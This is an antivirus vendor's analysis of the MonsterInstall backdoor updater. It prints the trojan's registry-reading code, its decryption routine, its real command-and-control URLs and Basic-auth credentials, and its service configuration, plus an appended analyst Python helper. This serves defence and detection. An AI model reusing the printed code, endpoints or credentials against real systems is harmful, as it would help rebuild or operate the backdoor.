Trojan.MonsterInstall.1

Added to the Dr.Web virus database: 2019-03-28

Virus description added:

SHA1:

  • 4f053ad18150f07f15039bd845d3e2db8bd50c72 (main.js)
  • b24e8dfd44a42a74e8c47d759d36fc178d988a93 (start.js)
  • 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 (crypto.dll)
  • d0a6fab0e4c98413f56f96d68c11ebd64db090cf (network.dll)
  • 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 (windows.dll)
  • efe12a67e009c93f0702cc775b78bc70bdac0cd3 (service.exe)

Description

A part of the MonsterInstall trojan that is responsible for updating the backdoor. It consists of several JS scripts and native C++ libraries.

Operating routine

The script is launched using Node.js. It installs itself into the C:\Windows\Reserve Service directory and runs as a service.

Libraries:

sha1 | name | ts | Pdb
--- | --- | --- | ---
7e6fc66e77fc02b36889043f65d9b654d826b780 | 7z.dll | 09.10.2016 01:26:26 |
d0d68b64b39495de80add1a66ecb55cab43a6b25 | 7zip.dll | 16.08.2018 22:02:00 | B:\Develop\VisualStudioProject\module\7zip\Release\7zip.pdb
2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 | crypto.dll | 20.08.2018 03:14:44 | B:\Develop\VisualStudioProject\module\crypto\Release\crypto.pdb
d0a6fab0e4c98413f56f96d68c11ebd64db090cf | network.dll | 17.08.2018 18:38:49 | B:\Develop\VisualStudioProject\module\network\Release\network.pdb
444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 | windows.dll | 20.08.2018 22:10:36 | B:\Develop\VisualStudioProject\module\windows\Release\windows.pdb
efe12a67e009c93f0702cc775b78bc70bdac0cd3 | daemon\service.exe | 22.03.2013 19:31:16 | c:\Users\Corey\Documents\workspace\node-windows\_tmp\winsw\obj\Release\winsw.pdb

The main module of the trojan is main.js. It sends a request to google.com, yandex.ru or www.i.ua in order to obtain the current date. After that, it decrypts the contents of the bootList.json file with the help of the crypto.dll library.

Decryption algorithm:


def decrypt(d, key='123'):
    # Each byte of the ciphertext has the corresponding byte of the
    # repeating key subtracted from it, modulo 256.
    s = ''
    for i in range(len(d)):
        s += chr((ord(d[i]) - ord(key[i % len(key)])) & 0xff)
    return s

The decrypted JSON file contains a list of C&C servers:

[{"node":"http://cortel8x.beget.tech/reserve/","weight":10},{"node":"http://reserve-system.ru/work/","weight":10}]

The trojan then reads information from the registry:


function getInfo()
{
    // Values the trojan keeps under its own registry keys, read through the native windows.dll library
    var WindowsNodeInfo = new Object();
    WindowsNodeInfo.mainId = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "mainId");
    WindowsNodeInfo.login = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "log");
    WindowsNodeInfo.password = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "pass");
    WindowsNodeInfo.source = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "source");
    WindowsNodeInfo.updaterVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "updaterVersion");
    WindowsNodeInfo.workerVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "workerVersion");
    var ReserveSystemInfo = new Object();
    ReserveSystemInfo.workerVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Reserve System", "updaterVersion");

    // Both objects are serialised and sent to the C&C server in the POST body
    var myInfo = new Object();
    myInfo.windowsNode = WindowsNodeInfo;
    myInfo.reserveSystem = ReserveSystemInfo;
    return JSON.stringify(myInfo);
}

After that, the trojan sends this data in a POST request to the C&C server decrypted earlier. An HTTP Basic authentication header corresponding to the credential pair “cortel:money” is also added to the request.

The server’s response:


{
    "data": {
        "updaterVersion": [0, 0, 0, 1],
        "updaterLink": "/upd.7z",
        "updaterVerify": "£ñß(\u0012Ä\ti¾$ë5ž»\u001c²\u001c\fÙ=±÷ö‚´èUnŽÐÂBÔ\n\u001dW6?u½\u0005Œn\u000fp:üÍ\u0019\u0000\u000bSý«\u00137®÷\u0013”’ì¥û§s7F\u0016ó\\\u000f%6ñê\"7î<ýo䃃0Æ%tñÅv­‚S¡\r\u001e•ÅÆ¡¿N)v\\f8\u0004F\fUS¯‰³§ oIõŒiÆîGݪ\u0017êH/8Ö1-°™[P5E7X‡Fø%SŠXÕ6Oþ=Vô‰…ˆ:.3Œ‚i\u000eÁù9Ã&¾ŒM\u001eÛªé$\u0006#IèÞÛ\u0018À\u001b^è,ÁòÑCTXb\u001d$ç\u0004„ð¶0UVÕ»e\u001f\b\u001e¡Ä¼è+Fjúÿoâz\r!çô3xØs—_\u000b\u0017\u001fY]\u0001¥j^û\\W",
        "dateTime": 1534868028000,
        "bootList": [{
            "node": "http://cortel8x.beget.tech/reserve/",
            "weight": 10
        }, {
            "node": "http://reserve-system.ru/work/",
            "weight": 10
        }]
    },
    "dataInfo": "I`ù@ÀP‘ÈcÊÛ´#ièÒ~\u0007<\u0001Ýìûl«ÔÆq\u0013àÛ\u0003\b\u0017ÑLÁ}ÿÚ˜DS®']\u0003bf\u0003!¿Cð¸q¸ÖÜ’B¢CÄAMˆÀA¤d\u001c5¨d-\u0013‰\u0011ѼF‘|SB[¬°(ܹÈÒÜ £L\u00071¾:`\u001bŒìýKõ\"²Ÿ¸$´3™UºÅ¨J†¨cƒf¿}r;Öeì¶x‰ØKt¥‹„47a\u001e¸Ô‡ˆy\u0006•\u001b\u0004‚‹„„•ó\u001a\u0019\nu>¨)bkæ…'\u00127@é‹7µæy3ÈNrS’Mð‡\u0018\u0019¾òÓ[Žå5H‡ƒ·¦k‘¿ÉŠ&PÂÈîåÚ~M\u0010ðnáH擪xÃv cד\u0013…T…ïÑÝ\tœŽ\u0018†Æ\u00148$”Ôî"
}

The trojan compares the value of the dateTime parameter to the current date. If the difference is more than a week (counted in milliseconds), the trojan does not execute commands. The dataInfo parameter contains a signature of the “data” field, which is verified with the public key embedded in main.js. The list of servers from the “bootList” parameter is encrypted and stored in the “bootList.json” file.

The trojan compares its own version to the version stated in the “updaterVersion” parameter of the server’s response. If the versions match, the trojan runs “upd\upd.exe” with “main.js” as a parameter. If the version in the server’s response is newer, the trojan downloads the upd.7z file from the link in the “updaterLink” parameter, verifies its signature and unpacks it. After that, it writes the update version to the registry under [HKLM\SOFTWARE\Microsoft\Reserve System] ‘updaterVersion’ and runs “upd\upd.exe” with “main.js” as a parameter.
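As an added example (not code from the page or from the trojan itself), the following Python implements the bootList.json decryption described above together with the dateTime freshness check and updaterVersion comparison from the last two paragraphs, in the form an analyst would use on a recovered sample. The placeholder node URL is constructed, and the element-wise version ordering and the 'none' branch are assumptions the page does not state.

```python
import json

KEY = '123'                          # key quoted in the description
WEEK_MS = 7 * 24 * 60 * 60 * 1000    # the one-week window, in milliseconds

def decrypt_bootlist(data: bytes, key: str = KEY) -> str:
    """Undo the repeating-key byte subtraction applied to bootList.json."""
    kb = key.encode()
    plain = bytes((b - kb[i % len(kb)]) & 0xff for i, b in enumerate(data))
    return plain.decode('latin-1')

def encrypt_bootlist(text: str, key: str = KEY) -> bytes:
    """Inverse of decrypt_bootlist; used here only to build a constructed sample."""
    kb = key.encode()
    raw = text.encode('latin-1')
    return bytes((b + kb[i % len(kb)]) & 0xff for i, b in enumerate(raw))

def cc_nodes(plaintext: str) -> list:
    """Return the C&C URLs from a decrypted bootList.json document."""
    return [entry['node'] for entry in json.loads(plaintext)]

def response_is_fresh(date_time_ms: int, now_ms: int) -> bool:
    """Replay check: a response is used only if dateTime is within one week of now."""
    return abs(now_ms - date_time_ms) <= WEEK_MS

def version_action(local: list, remote: list) -> str:
    """Decide what the updater does for a reported updaterVersion such as [0, 0, 0, 1].

    'run' and 'update' follow the description; 'none' for an older remote version is
    an assumption, since the page does not say what happens in that case."""
    if remote == local:
        return 'run'       # run upd\upd.exe main.js as-is
    if remote > local:     # assumed element-wise order, most significant element first
        return 'update'    # fetch updaterLink, verify signature, unpack, record version, run
    return 'none'

# Constructed sample: a bootList.json plaintext with a placeholder node, encrypted the same way.
SAMPLE_PLAIN = '[{"node":"http://c2.example.invalid/reserve/","weight":10}]'
SAMPLE_ENCRYPTED = encrypt_bootlist(SAMPLE_PLAIN)

if __name__ == '__main__':
    print(cc_nodes(decrypt_bootlist(SAMPLE_ENCRYPTED)))
    print(response_is_fresh(1534868028000, 1534868028000 + WEEK_MS + 1))
    print(version_action([0, 0, 0, 1], [0, 0, 0, 2]))
```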

start.js

Launches %win%\Reserve Service\reserve.exe "main.js".

service.exe

A build of the “winsw” utility. It uses the following XML file with parameters:

<service>
    <id>service.exe.exe</id>
    <executable>C:\Windows\Reserve Service\reserve.exe</executable>
    <arguments>"C:\Windows\Reserve Service\start.js" </arguments>
</service>

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and the removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.